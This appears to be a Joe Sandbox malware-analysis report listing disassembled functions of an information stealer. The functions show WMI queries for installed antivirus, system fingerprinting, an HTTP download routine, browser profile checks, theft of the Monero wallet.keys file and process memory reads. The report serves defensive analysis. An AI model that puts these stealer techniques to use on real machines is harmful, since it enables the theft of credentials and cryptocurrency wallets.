Instruction Fuzzy Hash: 685119B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F54

Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0041199E
CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

VariantClear.OLEAUT32(?), ref: 00411A8B

Strings

Select * From AntiVirusProduct, xrefs: 00411A23
Unknown, xrefs: 00411AA0
root\SecurityCenter2, xrefs: 004119F0
displayName, xrefs: 00411A6F
Unknown, xrefs: 00411AB4
WQL, xrefs: 00411A28
Unknown, xrefs: 00411A99

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
API String ID: 4288110179-315474579
Opcode ID: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
Instruction ID: a052c58cf411f7e98e6331d271807bd97e667b65bf600afed1fc3e3d3cff73f9
Opcode Fuzzy Hash: 4442dc1975a9fab6dcc5a7b23437fd681a9a23585e5f68a612e680f3410bdaea
Instruction Fuzzy Hash: 90314F70A04245BBCB20DB91DC49EEFBF7CEFC9B10F20465AF611A61A0C6B85941CB68

Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004012A7
_memset.LIBCMT ref: 004012B6
lstrcatA.KERNEL32(?,0043AAA4), ref: 004012D0
lstrcatA.KERNEL32(?,0043AAA8), ref: 004012DE
lstrcatA.KERNEL32(?,0043AAAC), ref: 004012EC
lstrcatA.KERNEL32(?,0043AAB0), ref: 004012FA
lstrcatA.KERNEL32(?,0043AAB4), ref: 00401308
lstrcatA.KERNEL32(?,0043AAB8), ref: 00401316
lstrcatA.KERNEL32(?,0043AABC), ref: 00401324
lstrcatA.KERNEL32(?,0043AAC0), ref: 00401332
lstrcatA.KERNEL32(?,0043AAC4), ref: 00401340
lstrcatA.KERNEL32(?,0043AAC8), ref: 0040134E
lstrcatA.KERNEL32(?,0043AACC), ref: 0040135C
lstrcatA.KERNEL32(?,0043AAD0), ref: 0040136A
lstrcatA.KERNEL32(?,0043AAD4), ref: 00401378

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

ExitProcess.KERNEL32 ref: 004013E3

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
String ID:
API String ID: 1553874529-0
Opcode ID: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
Instruction ID: 9778931569992fdfa2ae274a5f191432572d6dba79c88691fb85554d5ade8f97
Opcode Fuzzy Hash: 2857db7161bcc320a30419e20b2b34e424e7c04c5a94567df98be0c40a6a9c3d
Instruction Fuzzy Hash: 9A41A9B2D4422C57DB20EBB19C59FDB7BAC9F18310F5405A3E8D9E3181D67C9A84CB58

Function 00411203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
RegCloseKey.ADVAPI32(?), ref: 00411446
RegCloseKey.ADVAPI32(?), ref: 00411466
RegCloseKey.ADVAPI32(?), ref: 00411472

Strings

- , xrefs: 004113E6
?, xrefs: 00411263
%s\%s, xrefs: 004112D7

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 2394436309-3278919252
Opcode ID: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
Instruction ID: 4bdd8942e51cb3c4ef1bdab2b95b8e79246b76881c5f67d30fe8b157efa9521a
Opcode Fuzzy Hash: 3d69115a6f8724683417ca135766935035775c138346bf0c7f6cb84cd66cf9a6
Instruction Fuzzy Hash: 8A61F7B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Strings

QuBi, xrefs: 00410A27
C, xrefs: 004109DF
:\, xrefs: 00410A06
0xA, xrefs: 00410B21

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: 0xA$:\$C$QuBi
API String ID: 1856320939-2474135401
Opcode ID: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
Instruction ID: a97db629e7901cba1803c5ad0a4512298f3feb58bff5cd952ebdd5184ea07982
Opcode Fuzzy Hash: fe1506f50967b878d8a816889520671eb8f24b5d456e6e545ca51c3c9142c769
Instruction Fuzzy Hash: A741AFB1A042289BCB249F749D85ADEBBB9EF19304F0000EAF109E3121E6758FD58F54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400,?), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 2622774ff033b8d6197b84d2c8ed8e0254789b43bb7c8e328d0127d0790bac85
Instruction ID: 38e87463d8a567d304acc58f085aeda0b6ea51c0627365b5ff586089dea0ca20
Opcode Fuzzy Hash: 2622774ff033b8d6197b84d2c8ed8e0254789b43bb7c8e328d0127d0790bac85
Instruction Fuzzy Hash: ED411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA8

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040EB71
Stable\, xrefs: 0040ED5B
firefox, xrefs: 0040EE17

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: 161ecba77e78b84977177c9a2eec29f434eb24eb35194929f651236fe4565c49
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: 161ecba77e78b84977177c9a2eec29f434eb24eb35194929f651236fe4565c49
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00401AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4
Part of subcall function 00401A51: RegCloseKey.ADVAPI32(00401AE9), ref: 00401AAD

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

CopyFileA.KERNEL32(?,?,00000001), ref: 00401C2A

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 00401C9D

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

\Monero\wallet.keys, xrefs: 00401B2F
.keys, xrefs: 00401B0D

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 615783205-3586502688
Opcode ID: e315d58a9e0246034c20351f87248d432db0c5e929893418433aec7ea3ed2e35
Instruction ID: 2364c372bad150323d67af03c4d359b51cc93a95bd900eacfe79e48eddbf336c
Opcode Fuzzy Hash: e315d58a9e0246034c20351f87248d432db0c5e929893418433aec7ea3ed2e35
Instruction Fuzzy Hash: 13515EB1E5011D9BCF11EB25DD466DD7379AF04308F1050BAB60873191DA78AFC98F48

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9
Part of subcall function 00415B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00415C86
Part of subcall function 00415B0B: DeleteFileA.KERNEL32(?), ref: 00415CA9

Strings

\{A, xrefs: 00415FC2

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
String ID: \{A
API String ID: 1546541418-1475862525
Opcode ID: fd90d1f86306442e305425050af88687509090e34ac0bef08d4a2f84645a5be9
Instruction ID: 1319a00e3beaa56ad984c577cc8328c236cda2b61ebb5edaa0c38c4a30c6fdde
Opcode Fuzzy Hash: fd90d1f86306442e305425050af88687509090e34ac0bef08d4a2f84645a5be9
Instruction Fuzzy Hash: 1E51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAFA09E3250EA35AB898F58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
Instruction ID: 446351bc283c4762e53d247ac54b49bb6219315ee7fac77137ec1a6eb046dabb
